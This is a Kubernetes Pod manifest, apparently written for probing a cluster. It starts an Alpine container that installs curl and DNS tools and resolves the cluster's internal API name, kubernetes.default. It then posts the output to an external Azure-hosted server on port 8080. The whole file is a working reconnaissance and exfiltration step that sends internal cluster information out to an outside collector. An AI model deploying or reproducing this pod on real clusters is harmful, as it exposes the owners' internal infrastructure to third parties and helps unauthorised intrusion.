apiVersion: v1
kind: Pod
metadata:
  name: resolve-api
spec:
  containers:
    - name: shell
      image: alpine
      command:
        - sh
        - -c
        - |
          apk add --no-cache curl bind-tools;
          {
            echo '>> RESOLVENDO API INTERNA';
            nslookup kubernetes.default;
          } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
  restartPolicy: Never
